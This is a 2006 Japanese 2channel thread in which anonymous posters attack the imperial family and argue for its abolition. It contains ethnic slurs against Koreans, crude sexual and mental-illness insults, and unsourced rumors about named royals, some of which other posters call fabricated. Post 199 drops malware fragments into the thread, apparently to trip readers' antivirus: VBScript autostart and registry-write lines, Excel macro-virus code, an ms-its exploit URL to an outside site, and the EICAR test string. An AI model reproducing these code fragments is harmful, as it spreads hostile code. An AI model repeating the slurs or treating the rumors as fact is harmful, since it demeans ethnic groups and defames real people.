135 :可愛い奥様:2006/12/12(火) 00:25:14 ID:W02O5Bqz
>>133
出た〜バカの一つ覚えの常套句、この国からでていけ。
だったら皇族だって出て行ってもらっても良いじゃない?
日本国は皇族だけのものでないよ。わたしだって家も土地もあるのに何で
でていかなきゃいかんのよ。

136 :可愛い奥様:2006/12/12(火) 00:30:19 ID:yUMNCHGb
皇族信者は、犬とセックスするらしいね。
天皇の命令で戦死した家族に対して、日本から消えていなくなれとは
どんな顔と口をして言っているのかね。
天皇教信者は鬼同然の冷血動物だと今更ながら確信したよ。

万世一系なんて 偽物だよね。バカみたい。
その上、血が汚れてしまって、池沼ばかりジャン。



137 :可愛い奥様:2006/12/12(火) 00:40:43 ID:W02O5Bqz
万世一系なんて 偽物だよね。それこそ皇族信者が言う犬の血でも入ってるかも。
策略なんかで絶対正統な血統なんかでないと思うね。でもだったらなんだって言うのかな。
そんな万世一系続いたからって毎年200億の税金使う必要あるの?
やっぱ財団つくりグッズ販売で生活してほしいね。

138 :可愛い奥様:2006/12/12(火) 00:46:11 ID:vEOPy5cV
このまま今上の代で皇室終わりそう
ナルマサアイコの三位一体は最凶かつ最狂

139 :可愛い奥様:2006/12/12(火) 00:55:50 ID:tB0gpoz5
すごい釣れてる・・・

結局なんの理論も根拠も持ってないから「皇室」っていう言葉だけで
脊髄反射してファビョっちゃうんだな。おもしれえ〜
ノラ犬と交わったて書いただけで=犬とリアルセックス?
ならず者て意味なんだけどww 発想がもうそのまんまでおもしろい人たちだね

140 :可愛い奥様:2006/12/12(火) 00:58:05 ID:tB0gpoz5
>>135 どの口が「日本国」なんて言ってんの?
仮にも日本国の国民なら現憲法には天皇は象徴って謳ってあるんだけど
義務教育受けてんだか受けてないんだかわかんねーほどのレベルの人には理解できないかな?

141 :可愛い奥様:2006/12/12(火) 00:59:51 ID:tB0gpoz5
>>136 >天皇の命令で戦死した家族
この前提が間違ってる以上、あんたの意見は聞くまでもないよね。
日教組ばっかりの学校で歴史習ったの?w

142 :可愛い奥様:2006/12/12(火) 01:00:32 ID:tB0gpoz5
>>137
>>139

143 :可愛い奥様:2006/12/12(火) 01:01:04 ID:tB0gpoz5
>>138 脳内妄想中

144 :可愛い奥様:2006/12/12(火) 02:49:50 ID:b+JNmuWy
今上こそ朝鮮半島が好きなようだから、帰ったら?
大体、雅子様バッシングを続ける文春は、別名『週刊 野中』。
解り易過ぎる。

145 :可愛い奥様:2006/12/12(火) 03:44:56 ID:BoNZwIsh
どこかの記事に天皇家は日本の大家と書いてあった…ヤダ。

146 :可愛い奥様:2006/12/12(火) 03:58:37 ID:TX4t621m
天皇家は要らない。雅子さんは実家に戻ってください。

147 :可愛い奥様:2006/12/12(火) 06:27:42 ID:PaN8nojn
天皇家のルーツがどこにあるかで各々捉え方が違うかもね。
元々の原住民だと言い張る人はあんまりいないし
血統の正当性云々は「世界一続いてる」という
部分を必死で強調してるという印象。


148 :可愛い奥様:2006/12/12(火) 07:51:28 ID:Wpv7H9kq
天皇家は時流で引っ張りだされ用の無い時は生かさず殺さず。
たいして歴史をかじってなくてもこれぐらいはわかると思うんだけどね。

愛子さん見てるとお嬢様と言うものもいいなとは思うけど
あれは皇族のよさというより両親のセンスかな

149 :可愛い奥様:2006/12/12(火) 09:28:03 ID:WfqkVKuy
>>148
よしよし、朝から楽しい書き込みご苦労さんだったね

150 :可愛い奥様:2006/12/12(火) 09:32:52 ID:W02O5Bqz
ID:tB0gpoz5
ノラ犬と交わったて書いただけで=犬とリアルセックス?

こんな言葉つかう日本人信じられないどこの国の人?
これだけ言うんだからあんた皇族先頭に立って飼いなよ。あんたみたいな人一杯
集まってくるかも、ただ長くなって自腹続くとみんな逃げてくだろうねwww


151 :可愛い奥様:2006/12/12(火) 09:40:17 ID:qHNMCURm
ID:tB0gpoz5にそんな財力あるわけないじゃんw

152 :可愛い奥様:2006/12/12(火) 09:54:56 ID:i6MpBlfu
アダムスファミリーみたいに異様で奇怪で気持ちの悪い一族だよなあ。

こんな皇室イラネ〜

153 :可愛い奥様:2006/12/12(火) 09:57:27 ID:TyMnroEU
皇室に疑問を持つのは、いい事
しっかり監視もしなければ、腐ってしまう。
それなりの権力は持っているし、影響力もある。
天皇は、大きな責任を負っている。




154 :可愛い奥様:2006/12/12(火) 10:25:09 ID:CPO90UJD
夕べはすごい電波が来たんだね
きっと普段、朝鮮人だの犬だの言われてるんだよ
日本語不自由な人って自分が言われてる悪口を
鸚鵡返しするしかないらしいしね。
スレタイすら読めない外国人だ。

155 :可愛い奥様:2006/12/12(火) 10:44:05 ID:PaN8nojn
>愛子さん見てるとお嬢様と言うものもいいなとは思うけど
>あれは皇族のよさというより両親のセンスかな

確かに自閉症の子供をあそこまで見せるのは
たいした根性だなと思ったりするね。
可能な限りの時間・労力・金を注ぎ込んでるんだろう。
嘘八百並べた大本営発表も未だ健在といったとこだね。


156 :可愛い奥様:2006/12/12(火) 11:42:36 ID:TyMnroEU
大本営が、何言っても、現実は、どうしようもない。
今上は、在りに儘に、生きていらしゃると、思っていたが、
嘘八百、、、、、かもしれないのかな。 残念だ、

157 :可愛い奥様:2006/12/12(火) 11:44:39 ID:yUMNCHGb
ID:tB0gpoz5

これが池田大作の回し者か?下品なうえ人間らしい涙のない人間だし、工作活動をしているな。
創価が天皇家を乗っ取ろうとしているのは、本当かも知れない。


158 :可愛い奥様:2006/12/12(火) 12:02:10 ID:29FRBV0W
層化の金で養うのか・・・
層化の信者って皇室嫌いだし、皇室って神道だから
反発がすごそうだ。層化崩壊か?
それまで大作が生きていればの話だけど。

159 :可愛い奥様:2006/12/12(火) 12:20:26 ID:TyMnroEU
嫌いにもなるわな。
天皇皇后が、一生懸命やっても、東宮の愚行のほうが、その上行くから
嫌になる人多いだろな。全ては天皇の責任だから、仕方ない。

160 :可愛い奥様:2006/12/12(火) 14:16:03 ID:gXJCDOkR
美智子は子育て失敗。
長男は、マイホームパパで、ヘタレ嫁は実家べったり。
次男は、わがまま風味、嫁はキモい程の野心家。
長女は、ダサい行き遅れだったが、
何とか、財産なし、家柄なしのオタク男にもらってもらう始末。
もう理想の家族なんて、誰も思ってませんからw

161 :可愛い奥様:2006/12/12(火) 14:21:09 ID:DOwHfaNm
アキヒト逝ってよし

162 :可愛い奥様:2006/12/12(火) 15:30:58 ID:9QMuEqcU
今の天皇家一家を追い出したい

163 :可愛い奥様:2006/12/12(火) 19:38:52 ID:b+JNmuWy
私の故郷はさぁ、多分古代に天皇家に占領されたんだよ。
‘古代’と言っても、欧州ならば数々の宗教会議が開かれたり、神学大全が書かれたりしていた頃でしょ。
欧州の‘中世’とかぶる日本の‘古代’が謎に満ち過ぎているのは、あまりに後進国ぽくて、変なんだって。
これも、天皇陵の調査とか、させないからでしょ。
明るみに出たら困る事が、一杯あるんだよ、あの一族。

164 :可愛い奥様:2006/12/12(火) 19:44:03 ID:b+JNmuWy
163の訂正。

 神学大全じゃなくて、神の国。

165 :可愛い奥様:2006/12/13(水) 01:04:38 ID:3nCh/9Hg
お墓に何百億の金使うのやめれ!
弱者に対する税金どんどん削るのにこのアホ面連中には湯水のごとくいや滝のごとく
金使いまくり。。。いいかげんに汁。

166 :可愛い奥様:2006/12/13(水) 01:47:57 ID:qGn7+Nx9
「プリンセス・マサコ」の作者ベン・ヒルズの妻は在日韓国人3世って噂は本当かな?
それじゃ、夫婦そろって日本人と皇室を毛嫌いしてボロクソに書くのもわかる様な気がする(w

167 :可愛い奥様:2006/12/13(水) 01:56:56 ID:bZ1Pqp14
>>160
私もそんな気がしてた。
っつうか、天皇性って。


168 :可愛い奥様:2006/12/13(水) 12:55:20 ID:kaDaGmq4
>>160
アキヒトは美智子の尻に敷かれっぱなしのヘタレ。

これも追加して下さい。

169 :可愛い奥様:2006/12/13(水) 13:24:46 ID:JiD6O6+X
もっと景気が悪くなって、消費税アップ&その他税金アップの
国民からお金をしぼり取る政策が進んでも
 雅子さま達が海外豪遊旅行等の、公務はしないで贅沢というような事していたら、
否定派が多くなるかも。 その他の皇族方がきちんとしていても
 本流の東宮方があれじゃ〜・・。
 

170 :可愛い奥様:2006/12/13(水) 13:34:26 ID:/czuWea1
いらん公務大杉。
テープカットやって金もらってそんな公務なんていらん。
しかも目の色変えて男産めとか、どう考えても引く。

171 :可愛い奥様:2006/12/13(水) 14:28:06 ID:RzuJBirx
公務とはいえない代物となり下がってる。
怪しいバイト

172 :可愛い奥様:2006/12/13(水) 14:55:20 ID:jpMIuZDN
公務なんか全撤廃で良いよ

公務するから余計な金がかかる
無駄なことはしないほうがよろし

173 ::可愛い奥様::2006/12/13(水) 15:58:08 ID:mSOrHCp3
分刻みのスケジュールって本当かな?

174 :可愛い奥様:2006/12/13(水) 15:58:36 ID:3nCh/9Hg
あの人たち側に来て顔みて何がうれしい?信じられんよ。
マンセーは北朝鮮人民タイプの人間か水戸肛門にヘヘェーッてひざまづく現代人
なのかな?その時代に戻れよ。。。

175 :可愛い奥様:2006/12/13(水) 16:05:22 ID:bCwWCHWN
>173
秒刻みらしいよ

176 :可愛い奥様:2006/12/13(水) 16:07:05 ID:oo9aGPVr
天皇陛下万歳!っていって死んだ人たちに、心から悪いと思ってなさそう。
靖国は天皇がいくべきだろうに。

177 :可愛い奥様:2006/12/13(水) 17:12:50 ID:fFqzn7P1
ここですか唯物主義者の集まるスレは?

178 :可愛い奥様:2006/12/13(水) 20:11:18 ID:zb8ydKfM
東京大空襲の時に、門を堅く閉ざして、逃げて来た人達を皇居内に入れなかったのだって?
私の祖父は、世田谷に家があって、3月10日の夜、下町方向の遠くの空が赤く見えて、
まるで花火が上がり続けていたようだった、と語っていた(もう、故人)。
隅田川の方に工場を持っていたので、翌日見に行ってみると、死骸の山、
時々、キューピーのように腹が膨らんで、セルロイドの人形みたいになって転がっている死体があって、とても人間とは思えなかったそうだ。
工場の人達は、全員(何人いたか、聞いてないが・・)、防空壕で蒸し焼きになっていたのだって。
もっと詳しい話を、聞いておけば良かったと後悔いるが、この話は一生忘れない。

5月の空襲で、我が家は無事だったけど、親戚や嫁ぎ先は皆焼かれているし、
天皇が靖国参拝しないなんて、信じられない!!
下らないテープ・カットの小遣い稼ぎ公務を100やったって、何の意味もない。
そんなモドキ公務はしなくていいから(却って、税金の無駄)、靖国参拝して欲しい。

179 :可愛い奥様:2006/12/13(水) 20:15:23 ID:zb8ydKfM
178です。
7行目、後悔している、と訂正です。

180 :可愛い奥様:2006/12/13(水) 20:26:46 ID:RzuJBirx
でも天皇が靖国参拝したとき
いよいよ天皇制終わりかも

181 :可愛い奥様:2006/12/13(水) 21:11:25 ID:zZUxcZI9
今上は、まあどうでも良いけど、昭和天皇くらいは最後まで靖国参拝
(参拝じゃないんだっけ?)を続けて欲しかった。
A級戦犯も含めて、皆、昭和天皇の盾となり犠牲になったような人たちなのだし。

182 :可愛い奥様:2006/12/13(水) 21:27:24 ID:oo9aGPVr
なんで今上は参拝しないのかね
人のいいなりじゃん。
この人たちは今後訪れるであろう関東大震災もしっかり生き残るだろうね。

183 :可愛い奥様:2006/12/13(水) 21:56:16 ID:6KqOEUuM
日本の象徴は富士山でいい。
こんな借金まみれの国なのだから皇族も早く普通の国民になって
税金納めて、借金返しに協力してほしい。

184 :可愛い奥様:2006/12/13(水) 23:12:33 ID:3nCh/9Hg
あの家族理想的か?秋なんかトロンとした顔して子供作って手柄みたいにしてるけど
こいつの若いころの行状見ててとても尊敬なんかできん。まだノーベル賞の田中
さんなんかのほうがどんだけか好感もてる。万系一世だって怪しいものだしだったらなんだ
っていうのだ。祖先元たどればみんな猿だろ。

皇族って全く関心なかったけど昭和天皇死んだとき日本全体自粛させられておかしいと火がついた。
国民に自粛散々させといてその年だか翌年かな?秋のニタニタ結婚、発情してる以外の何者でもなく
不快でしかたなかった。そしてパレードではこんな若造のために大の大人の警察官道路に2メートル
間隔に並ばされて。川島の超ど庶民の血も半分入ることだしますますありがたくないね。
秋のことが多かったけど皇室なくなればいいと心底おもってる。

185 :可愛い奥様:2006/12/14(木) 15:10:18 ID:zDLTqdgM
なんでこの一族はこんなに気持ち悪いのばっかなんだろう。こいつらが出て
来るたびに鳥肌が立つような不快感を感じるのは私だけか?

186 :可愛い奥様:2006/12/14(木) 15:16:44 ID:KyPK2ppT
いいえ私もです。こんな人間たちにどうしてマンセーできるか不思議で
なりません。借金だらけの国が毎年200億もの税金をこの珍獣たちに
投入してる場合でしょうか?もっと国民のためになるようなことしてくれるのなら
ともかく…な〜んも関係ないおッさんおばさんを敬えといわれてもねえ。。。

187 :可愛い奥様:2006/12/14(木) 15:42:43 ID:zDLTqdgM
皇室は祈りだなどとほざかれて、只の粉屋の娘だった婆さんに祈られても
国民から見ればちっとも有難くもなんともない。
そんなつまらない事を押し付けないで欲しい。

188 :可愛い奥様:2006/12/14(木) 16:50:49 ID:DLKZLBD5
素朴な疑問なんだけど、なんで敬語使わなきゃいけないんだろ。

189 :可愛い奥様:2006/12/14(木) 17:03:56 ID:mKKU32mG
>>183
まさにそのとおりです。
日本の象徴は富士山でいい。名言ですね。
納税し義務を果たす普通の人になってほしいね。

190 :可愛い奥様:2006/12/14(木) 18:16:49 ID:3x0GI7PS
>>188
日王に敬語なんて笑っちゃうよね。
倭面土国の酋長程度がね。

191 :可愛い奥様:2006/12/14(木) 18:17:13 ID:sqPHFJmR
今の皇室が「国民の象徴」だなんて、嗤っちゃうし、屁も出る。

東宮一家を追い出して、鯰を次の天皇にしようと目論む勢力があるようだが、
お前等、用心しろよ、
そんな事をしたら・・・・・・・・・・・・・・・・・・・・・・【省略】!!!!

192 :可愛い奥様:2006/12/14(木) 19:39:50 ID:UE38EFBl
仮面家族の象徴である皇族。

193 :可愛い奥様:2006/12/14(木) 20:56:44 ID:mKKU32mG
戦前や戦後直後は必要な制度だったのかもしれないが、もう
その役目を終えていると思う。
徐々に縮小されて、時代とともに平民に普通の国民になっていくんじゃないのかな。
もう意味ないでしょ。あの方々も、模範たれという演技しなくてもいいわけだし
降りてしまわれたほうが絶対楽ですよ。

194 :可愛い奥様:2006/12/14(木) 23:47:59 ID:uhJTzgxp
ここですか、ネカマブサヨのいるスレは?

195 :誘導:2006/12/14(木) 23:48:47 ID:UetalqyY
【 新・皇室御一行様 1 】
http://human5.2ch.net/test/read.cgi/ms/1162867558/l50
皇室御一行様★アンチ編★part739
http://human5.2ch.net/test/read.cgi/ms/1166062486/l50

196 :可愛い奥様:2006/12/15(金) 00:07:38 ID:C7kveuak
>>195
ムダな抵抗やめたら?

197 :可愛い奥様:2006/12/15(金) 00:32:07 ID:kUs6KMWZ
来年、中国訪問するの?

198 :可愛い奥様:2006/12/15(金) 01:00:09 ID:Q47SXIeK
もう中国から帰ってこないでくらさい。

199 :可愛い奥様:2006/12/15(金) 03:17:43 ID:mhYEklaj
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
܃ܷܵܶޫޭॢ

200 :可愛い奥様:2006/12/15(金) 05:00:17 ID:9Xj6n2Ii
粉屋の娘が皇太子妃になった時点で皇室はおhる

201 :可愛い奥様:2006/12/15(金) 09:07:39 ID:wIX5WsVy
考えてみれば、公務を見直して小さい皇室を目指していく皇太子案って、すごく利に叶っているわけだが、
天皇皇后秋篠宮及び宮内庁は公務減らす?とんでもないって方向だもんなぁ。
テープカットに精出して、小遣い稼ぎたいのが見え見え。
公務は受け身とか言って、言われたまんまどうでもいいようなとこまで行って、金使って金もらって帰ってくるわけだし。

202 :可愛い奥様:2006/12/15(金) 09:25:16 ID:ko7rbZSH
そろそろ言われたものをただ漫然と受身でこなすだけではなく
内容の厳選も必要だと思う。
公務1つこなすにしても警備費や事前の手配などでそれなりの
費用がかかるのだろうから。
一度、一回の公務にどれだけの費用や手間がかかるのか算出して
公開して欲しい。その数字を見た上で国民が判断することも必要。

同じ費用を使うのであれば、公務の方向性も少し見直した方が良いでしょ。
今のように客寄せパンダ的扱いのままで良いのかどうか。

203 :可愛い奥様:2006/12/15(金) 16:48:16 ID:Q47SXIeK
20数名の皇族こいつら200億もの税金一年で使うほど価値ある人間か?
本物の神様とでもいうなら別だけど人間だろ?
苦労少ないし最高の環境にいるから長生きすること、すること。。。

こんなもの早く消滅してほすい。。。

204 :可愛い奥様:2006/12/15(金) 16:54:25 ID:srtk5TEN
狂ってる。ここの人たち全員。
精神病院から書き込みしてるグループ?


205 :可愛い奥様:2006/12/15(金) 16:57:43 ID:BKujQlrY
馬鹿どものガス抜きスレだから、でもまあ比較的書き込みも少ないし・・・。

206 :可愛い奥様:2006/12/15(金) 17:01:36 ID:nspvWipV
君主の意味が分からない人って、政治的頂点に立つ人間の狂気をしらないひと。
どれだけ勘違いした権力行使欲や、虚名欲で人をめちゃくちゃな扱いするのか。
その暴虐に抑制をかけるのが君主なのよ。

207 :可愛い奥様:2006/12/15(金) 17:05:32 ID:Q47SXIeK
>>204>>205

早く基地外病院へお戻りをいつもの松沢病院専用車に乗ってねw
北朝鮮風味の者はここへ来てほしくない。

208 :可愛い奥様:2006/12/15(金) 17:09:08 ID:nspvWipV
ああ、私、北朝鮮は好きだなぁ。
あそこは土地の貧困さでどうしようもないんですよね。
民族や国だけが悪いんじゃなくて、本当に寒くて農業もうまく行かないんです。
金正日は意外と暖かそうな人の気がするよ。

209 :可愛い奥様:2006/12/15(金) 20:12:43 ID:Q47SXIeK
>>208
バカ正直に正体明かさなくても良いのにwww
>金正日は意外と暖かそうな人の気がするよ。

自分はたらふくうまいもの食って何百万人の人民餓死させてるのにこんなこと本気
で言ってるとは思えないけどねwまあ祖国の人だからしかたないかw

終戦後の日本の誰かもよく似てたな〜


210 :可愛い奥様:2006/12/15(金) 20:25:59 ID:DyWrMJKf
まあ、息子や嫁を表立っていびるってのはどの国の人でもド庶民でも引くわな

211 :可愛い奥様:2006/12/15(金) 20:50:06 ID:ADI9/ez1
日の丸・国歌大好き!!だけど天皇制・共産党・社会党・公明党は大嫌い!!

212 :可愛い奥様:2006/12/15(金) 21:05:37 ID:G/szFO6K
不思議だ。
ここ読んでいると、「右」と「左」って、
今までの概念じゃもう分類不可能というか。
新しい分類方法が必要なのかも。
いや、もう分類することって無意味なのかも。

213 :可愛い奥様:2006/12/16(土) 06:36:16 ID:yb1YalKU
日本には本当の意味での自由主義政党がない。
右も左も、本音は大きい政府で、一部の特権階級が牛耳り大衆は無知なままが良いと、共通点が沢山あります。
小泉さんの時に、好ましい方向に動き出したのに、安倍は何だかねぇ・・・・。
結局、大雑把な言い方をすると、
今の天皇は誰の象徴かと言うと、
税金で飯食ってる(たかってる)連中の象徴なわけです。
テープ・カットや植樹祭の下らなさは、年度末の掘り起こしちゃ埋めてる道路工事と同じ。


214 :可愛い奥様:2006/12/16(土) 08:06:00 ID:18NzisYl
小泉が望んだような小さな政府にしなければ日本は駄目だ。
天皇制をはじめとして日本には無駄が多すぎます。


215 :可愛い奥様:2006/12/16(土) 15:35:50 ID:N7/eYQRJ
>>214
天皇はムダじゃない。権力者の狂気をもっとおそれるべきだよ。
フセインやカダフィみたいなのが必ず出現して、自分を崇めさせる状況になるから。

216 :可愛い奥様:2006/12/16(土) 18:35:22 ID:4uuE7Zlr
>>215
アメリカなんか大統領制だけど、うまくやってるように見えるけど
そういうの目指したらダメ?
こういうこと言うと、国としての歴史が違うだろって言うのかなぁ。

217 :可愛い奥様:2006/12/16(土) 20:18:16 ID:kW01p3eU
小皿の雅子様いじめ、鯰妃のあてつけ出産で、本当に皇族嫌になった
何年か前は大好きだったけど。  キコさんかどうか知らないけど
高級毛皮10着のご購入宮家妃殿下とか。皆税金よ。それで国民からみて
尊敬に値するどころか、大奥まがいで、マスコミ使って東宮潰し。
単なる象徴ならもういらないんじゃないの?  皇室が世の中のいじめの
原点になってるなんてね。 千代田猛省せよ。

218 :可愛い奥様:2006/12/16(土) 21:31:33 ID:tG9+5rBf
大統領制がいいよ。宮家まで作って無駄、男子皇族どんどん増えたら皇族費
べらぼうになるし女性皇族だって認めたらネズミ算式に増えてどうしようもない。
伝統残したいなら京都にでもすっこんで細々と熱強的信者に養ってもらうのが
良いと思う。何のありがたみも感じない人間にまで押し付けるなと言いたい!

219 :可愛い奥様:2006/12/16(土) 21:54:40 ID:E9wu7PEz
今の時代、もう必要ないよ。
それに、子供何人もおろすようなしたたかな女が皇后になったら、それこそ日本終わりだね

220 :可愛い奥様:2006/12/16(土) 21:59:40 ID:QEk+1txn
愛子様、雅子様がいらっしゃる限り終わりません

221 :可愛い奥様:2006/12/16(土) 23:05:09 ID:OOz2EefI
>>216
>国としての歴史が違うだろって言うのかなぁ。

まさか。歴史の問題ではなく、現実性の問題。
こう考えてください。
・アメリカには夢がありすぎます。夢を求心力にできます。
・アメリカには抵抗すべきイギリス王権がいます。
 政治の存在からして抵抗する者たちという経緯なのです。

日本の廃止運動は、抵抗すべき対象であるところを
歴史や現実から抹殺してしまおうということでしょ。
その効果はちがうものになります。

222 :可愛い奥様:2006/12/16(土) 23:10:15 ID:OOz2EefI
>>217
彼らは本来の意義を守り、存続しただけ。
あなたに続くレスは218-220のような、身勝手な廃止派と一部の女性皇族への肩入れ派。

状況が変だと思わない?本来の意義を守り、存続の意思を示したことは当然と思う。
外務省東大勢力のいじめに抵抗したのが皇族ですよ。

あなたはいじめに抵抗した相手に激怒して大嫌いになるのですね。
すごく性格が悪いです。相手の本分を壊して押し潰そうとしたのは自分らの政治勢力じゃん。

223 :可愛い奥様:2006/12/16(土) 23:10:59 ID:E9wu7PEz
機械仕掛けでわらってる笑い人形みたい→皇族

キコさんも北挑戦の美女軍団にいそうだし

224 :可愛い奥様:2006/12/16(土) 23:19:16 ID:tG9+5rBf
あんな究極の無駄遣いする人間税金で養うの変、80才になっても開き缶拾って
生活してるひとこないだテレビでやってた。別に悪いことしてきたわけでもない。
こんな生活のひと自殺者も含めたらこの国は何万人いるのだ。。。
民主主義国家に天皇は不必要。人間は平等である。

225 :可愛い奥様:2006/12/16(土) 23:28:23 ID:rFBOtrfL
>>222
あなたみたいな男系維持(国民の少数派)の
意見のゴリ押しって大嫌い。

「性格」とか言ってるけど皇族を利用したいアンチ東宮の
プロ市民に見えるよ。


226 :可愛い奥様:2006/12/16(土) 23:30:35 ID:tG9+5rBf
ここは男系でも女系でもとにかく皇族きらいの人が集まるスレです。それ以外は
各自のところでやってほしい希望ですが。。。

227 :可愛い奥様:2006/12/17(日) 03:57:59 ID:Vz2BralZ
鯰が天皇、鬼狐が皇后になるような時には、
‘我々’はカリフォルニアで日本臨時政府を樹立します!!

228 :可愛い奥様:2006/12/17(日) 04:57:52 ID:vhBnlsp0
天皇はかなり優秀な外交官だよ。


229 :可愛い奥様:2006/12/17(日) 06:09:51 ID:wWtqO2oG
雅子様にはかなわないと思う

230 :可愛い奥様:2006/12/17(日) 06:28:22 ID:Vz2BralZ
>>228
どの天皇?

231 :可愛い奥様:2006/12/17(日) 06:33:53 ID:2pYNw9hK
外交官なんて大した意味のある言葉じゃないよ
清掃人とか水道工事人とかと同レベルの語
天皇が外交官という言い方自体が変。
ポジションが全然違うでしょ。
外交がそんなにも大事だって言うなら卑屈すぎ。
営業、渉外がそんなに大事な会社って見たことない。

232 :可愛い奥様:2006/12/17(日) 09:24:11 ID:QeXzv9q+
皇室外交がそんなに効果があるなら、専門のスキルをもっと磨いて
天皇も流暢に英語喋ったり、海外に変な皿を乗っけていくようなまねは
謹んでもらいたい。嫁に男児強要して毎月舅が月経を尋ねるなんてことを
バラされて国民に恥ずかしい思いをさせないで欲しい。
祭祀が最大の仕事なら京都に戻ってきてもいいけれど、京都人は結構
辛らつだから覚悟して来るといいと思う。


233 :可愛い奥様:2006/12/17(日) 10:40:11 ID:gPJwNEXp
>>232
京都は政治都市ですが。。。
宗教都市じゃないですよ。
そもそも桓武天皇がなぜ平城京を放棄したのかお忘れで?

234 :可愛い奥様:2006/12/17(日) 11:50:30 ID:QeXzv9q+
>233
何がいいたいのか不明だけど、御所って場所が京都にはありますの。
何も江戸城後のの徳川の霊場もあった近辺で祭祀をすることもなかろうにって
ことです。

235 :可愛い奥様:2006/12/17(日) 13:57:20 ID:OldosAap
>天皇も流暢に英語喋ったり

馬鹿だねー
天皇はきちんとした日本語ができればいいの。
英語なんてそんな下賎な実務覚える必要ないでしょ。
英語ぺらぺらなんて
天皇は床掃除の天才とか電気工事ができる、とか言うのと同じよ。

236 :可愛い奥様:2006/12/17(日) 19:24:03 ID:iAFvQmu/
人を馬鹿呼ばわりできるほど
日本語読めるならスレタイも読めるでしょうに
胸だけでなくお目目も肉に埋もれてらっしゃるのかしら・・・

237 :可愛い奥様:2006/12/17(日) 20:41:39 ID:BLDoLMes
>>232
それ本当?
変態じじいだよね。キモイ。
いつもへらへらしてにたついてるのはそのせいかもね。

238 :可愛い奥様:2006/12/18(月) 02:06:53 ID:DYJslUAE
じゃ、入内しなきゃいいのに。
産婦人科に股広げさせられるのがいやな人は
産婦人科に行かなきゃいいのよ。

だいたい今上天皇陛下が雅子ごときにセックスアピール
感じるわけないでしょ。何騒いでんのか、あほ。

で、まあその232は捏造だと思うけどね。

239 :可愛い奥様:2006/12/18(月) 09:28:59 ID:gZ8+rXhy
232が事実が捏造かはさておき。

事前に「毎月、義父から生理日の確認をされます。基礎体温表の提出も求められます」と
説明を受けた上で、納得して入内したのであれば>238の理屈ももっともだと思う。

240 :可愛い奥様:2006/12/18(月) 13:05:25 ID:lcv53izR
月経関係はベンヒルズ本で週刊朝日が紹介してたよね。
東宮太夫は「皇籍離脱」に関しての抗議はしたけど後はしてない。

241 :可愛い奥様:2006/12/19(火) 15:46:52 ID:f2M3Zw5B
天皇と皇族京都に返すよ。
皇居を公の財産として開放してくれ。

242 :可愛い奥様:2006/12/19(火) 16:22:26 ID:8dUWQyxG
伝統っていうならば、いまの皇居は天皇家とは一切関係がない徳川家の居城だったのだから、
国に明け渡して、都心のオアシスとして多数の国民の為に使用させて欲しいな。
伝統を重んじて、皇族は京都へお帰りになってください。


243 :可愛い奥様:2006/12/19(火) 16:31:54 ID:8dUWQyxG
京都御所の維持管理にも無駄に税金が使われている。
昔のように天皇が住めばよいのだよ。

血を血で洗うような将軍家の居城は皇族の住まいとしてもふさわしくない。
皇族は京都で蹴鞠をしたり、和歌を作って遊んでいればよいのだよ。


244 :可愛い奥様:2006/12/20(水) 00:53:08 ID:TGICDR/z
嫌いな人がなぜ皇族をどうこうすべきとか語ってるのでしょうねえ。
嫌いな人が皇族を京都に帰したがるの?
つまりそれは何かデメリットを強制しようという発想なわけね。
つまらないですね。

京都には確かに分家を置くべきだとは思いますが。

>>242
征夷大将軍源朝臣ってのは臣下の地位だと思うけど?

245 :可愛い奥様:2006/12/20(水) 13:42:58 ID:cwYOtt0t
廃止でもいいし、京都へご帰還でもいいけど、マスコミの前にいちいち顔出さないで欲しい

246 :可愛い奥様:2006/12/20(水) 14:10:51 ID:tUbEJH4x
今の時代、いらないと思う
秋篠宮?ナマズの方は金よこせって言ってるみたいだけど
5千万以上もらって何いってんだか

247 :可愛い奥様:2006/12/20(水) 16:04:06 ID:en6QO/RJ
3億使って海外静養しなきゃならん贅沢な嫁がいるような皇室なら廃止してしまえ!
毛皮買ったのもどうせこいつだろう。

248 :可愛い奥様:2006/12/20(水) 16:25:59 ID:dq142Y8J
毛皮買ったのキコだと思うけどね。男の人口餓鬼作ったご褒美、でどこかへ
横ながし。。。

249 :可愛い奥様:2006/12/21(木) 08:09:26 ID:dN/83y24
雅子だと思う。イライラヒステリーに皇太子が、オドオドご機嫌取り。

250 :可愛い奥様:2006/12/21(木) 08:21:48 ID:HmMML+20
特定の人を話したいなら、該当スレへ

251 :可愛い奥様:2006/12/21(木) 08:23:35 ID:UYmLRYB4
>>248
雅子乙

252 :可愛い奥様:2006/12/21(木) 10:46:44 ID:lU2CnDCx
人口餓鬼って、人工餓鬼のことか

253 :可愛い奥様:2006/12/21(木) 10:48:37 ID:6D44NBZU
雅子は毛皮より食べ歩きでしょ

254 :可愛い奥様:2006/12/21(木) 16:01:10 ID:f7o4mhF5
この一族ってなんでこんなにきもいの?見ているだけで気持ち悪くなる。
こんな連中が日本人の象徴だなんて言われたら「日本人ってきもい」と
世界の人たちは思っているんだろうなあ。

255 :可愛い奥様:2006/12/21(木) 16:08:09 ID:Ed0nFig/
天皇は左翼

256 :可愛い奥様:2006/12/21(木) 17:34:12 ID:2gHbY1eH
皇室は、
アホバカ雅子投入で、
只今炎上中wwwwwwwwwwwwwwwwww


257 :可愛い奥様:2006/12/21(木) 18:27:06 ID:ROzq4Xux
